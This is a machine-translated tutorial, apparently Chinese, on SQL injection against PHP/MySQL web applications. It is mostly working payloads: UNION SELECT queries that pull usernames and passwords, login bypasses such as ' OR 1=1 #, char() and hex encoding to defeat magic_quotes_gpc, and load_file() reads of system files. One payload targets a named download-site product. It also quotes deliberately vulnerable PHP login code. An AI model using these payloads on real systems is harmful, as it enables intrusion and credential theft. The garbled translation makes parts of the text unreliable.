PHP Injection 2

Let's build the injection statement.
Enter in input box
a% and 1=2 Union select 1,username,3,4,5,6,7,8, password,10,11 from
alphaauthor# into the SQL statement.

SELECT * from alphadb where the title like%a% and 1=2 Union Select
1,username,3,4,5,6,7,8, password,10,11 from alphaauthor#%
The results are as shown in Figure 17 OH

How, come out, haha, everything in control.

C: Let's take a look at all the injection attacks from the injection site.
1 First look at the background landing OH
Code First
login.php
.......
$query = "SELECT * from Alphaauthor where username="
. $HTTP _post_vars["UserName"]. "and
Password= ". $HTTP _post_vars["Password"]. " ";
$result =mysql_query ($query);
$data =mysql_fetch_array ($result);
if ($data)
{
echo "Backstage landing success";
}
Esle
{
echo "re-landing";
Exit
｝

.........
?>
Username and password were executed directly into SQL without any processing.
See how we get around it?
The classic or the one:
Enter the username and password box.
' OR =
into the SQL statement.
SELECT * from Alphaauthor where username= or = and password= or =
This brings in the $data must be true, that is, we successfully landed.
There are other bypass methods, the principle is the same, is to find ways to let $data return is true.
We can use these in the following ways OH
1.
User name and password are entered or a = a
SQL has become
SELECT * from Alphaauthor where username= or a = A and password=
or a = a

2.
User name and password are entered or 1=1 and ' =
SQL has become
SELECT * from Alphaauthor where username= or 1=1 and ' =
and password= or 1=1 and ' =

User name and password are entered or 2>1 and ' =
SQL has become
SELECT * from Alphaauthor where username= or 2>1 and ' =
and password= or 2>1 and ' =

3.
User name Input or 1=1 # password to enter freely
SQL has become
SELECT * from Alphaauthor where username= or 1=1 # and
password= anything

The back part is commented out, of course, return is true oh.
4.
Assuming admin's id=1, you can also

User name Input or id=1 # password to enter freely
SQL has become
SELECT * from Alphaauthor where username= or id=1 # and password= anything
As shown in Figure 18

Look at the effect Figure 19

What do you think? It landed directly!

As the saying goes, only can not think of can not do.
There are more construction methods waiting for you to think after class.

2 The second commonly used place of injection should be regarded as the location of the foreground data display.
It has been mentioned several times, and involves the digital type, character type, and so on, here will not repeat the ha.
Just to give an example of a retrospective
The blue sea Tide sound downloads the station-v2.0.3 Lite has injected the flaw, the code is no longer listed
Look directly at the results
http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%
201,2,password,4,username,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%
20dl_users
As shown in Figure 20

Look, we got what we wanted.
Username Alpha
Password a long string.
Why do we put the password in the 3 field, put the username in the 5 field, we have mentioned above oh, we guessed that 3 and 5 paragraphs should be the string type, and we want to display the Username and password field type should be the same, So let's put it this way oh.
Why do you use 18 fields? I do not know if you remember in the Union select Introduction where we mentioned that Union must require the same number of fields before and after select, we can increase the number of select to guess that the need for 18 fields, only so the content of the Union select will be the normal display Oh!
3) Other, such as data modification, user registration of the main need for user-level applications.
We've talked about the update and insert above, because it's not very common, it's no longer discussed here, and there are some advanced techniques for update and insert that will be mentioned below.
Two: The next step is to enter the Magic_quotes_gpc=on time of the injection attack teaching link
    when magic_quotes_gpc=on, all the variables in the intersection (single quotes),
"( double quotes), \ (backslash) and null characters are automatically converted to escape characters that contain backslashes.
    This makes the method of character injection come to naught, at which point we can only inject digital and have no
intval () processing, digital we've talked a lot about it, right, Because the digital type does not use single quotes naturally there is no bypass problem, for this situation we inject directly.
1) If it is a character type, it must look like this, without quoting the character.
    
Here we want to use some string processing functions first,
String processing functions are many, here we mainly talk about the following, we can refer to the MySQL Chinese reference manual 7.4.10.
    
    char () interprets parameters as integers and returns a string consisting of the ASCII code characters of these integers.
Of course you can also use the character of the 16 to replace the character, so it is also possible, the method is in the front of the 16 plus 0x, see the example below to understand.

login.php
......
$query = "SELECT * from". $art _system_db_table[user]. "
where Username= $username and password= ". $Pw." ";
......
?>

Let's say we know the backend username is Alpha.
Converted to ASCII followed by char (97,108,112,104,97)
The conversion into 16 is 0x616c706861
(We will provide 16 and ASCII conversion tools on the CD)
Okay, just type in the browser:

Http://localhost/site/admin/login.php?username=char (97,108,112,104,97)%23
The SQL statement becomes:

SELECT * FROM Alphaaut

Hor where Username=char (97,108,112,104,97) # and password=
As shown in Figure 21

As we expected, he carried it out smoothly and we got what we wanted.
Of course, we can also construct
Http://localhost/site/admin/login.php?username=0x616C706861%23
The SQL statement becomes:
SELECT * from Alphaauthor where username=0x616c706861%23# and password=
Once again, we are winners. It's a sense of accomplishment.

Maybe you'll ask if we can put the # in char ()
actually char (97,108,112,104,97) equals alpha
Note that Alpha is quoted as an alpha string.
We know in MySQL if the execution

Mysql> SELECT * from Dl_users where username=alpha;
ERROR 1054 (42S22): Unknown column alpha in WHERE clause
Look at the return error. Because he would think Alpha was a variable. So we have to put quotes on Alpha.
As follows
Mysql> SELECT * from dl_users where username= Alpha;
This is the right thing to do.
If you put the number in there, it's alpha#.
Bring into SQL statement
SELECT * from dl_users where username= alpha#;
Of course there is nothing, because even alpha# this user does not have.
OK, let's take a look at the following example

display.php
......
$query = "SELECT * from". $art _system_db_table[Article]. "
where type= $type;
......
?>

The code displays the content based on the type, $type does not have any filtering, and is not placed in the program with quotes.
Assuming the type contains the Xiaohua class, Xiaohua char () is converted to
char (120,105,97,111,104,117,97)

We build
Http://localhost/display.php?type=char (120,105,97,111,104,117,97) and 1=2 Union select 1,2,username,4,password, 6,7,8,9,10,11 from Alphaauthor
Brought into the SQL statement as:
SELECT * from ". $art _system_db_table[Article]."
where Type=char (120,105,97,111,104,117,97) and 1=2 Union select 1,2,username,4,password,6,7,8,9,10,11 from Alphaauthor
Look, our username and password are still coming out Oh! No screenshots, just imagine: P

2 Perhaps some people will ask, in the case of Magic_quotes_gpc=on powerful load_file () can still use it?
This is exactly the problem we are going to use, and the format of Load_file () is load_file (' File path ')
We found that simply converting the ' file path ' to char () would be OK. Try it!
Load_file (' C:/boot.ini ') into
Load_file (char (99,58,47,98,111,111,116,46,105,110,105))
Figure 22

Put it in a concrete injection.
http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%
201,2,load_file (Char
(99,58,47,98,111,111,116,46,105,110,105)), 4,5,6,7,8,9,10,11,12,13,14,15,16,
17,18
Look at Figure 23

Look, we've seen the contents of Boot.ini, OH.
It is a pity that into the outfile can not be bypassed, otherwise it will be more fun. But there is still one place where you can use the SELECT * from table into outfile. (Sell a few words first, the following will tell you)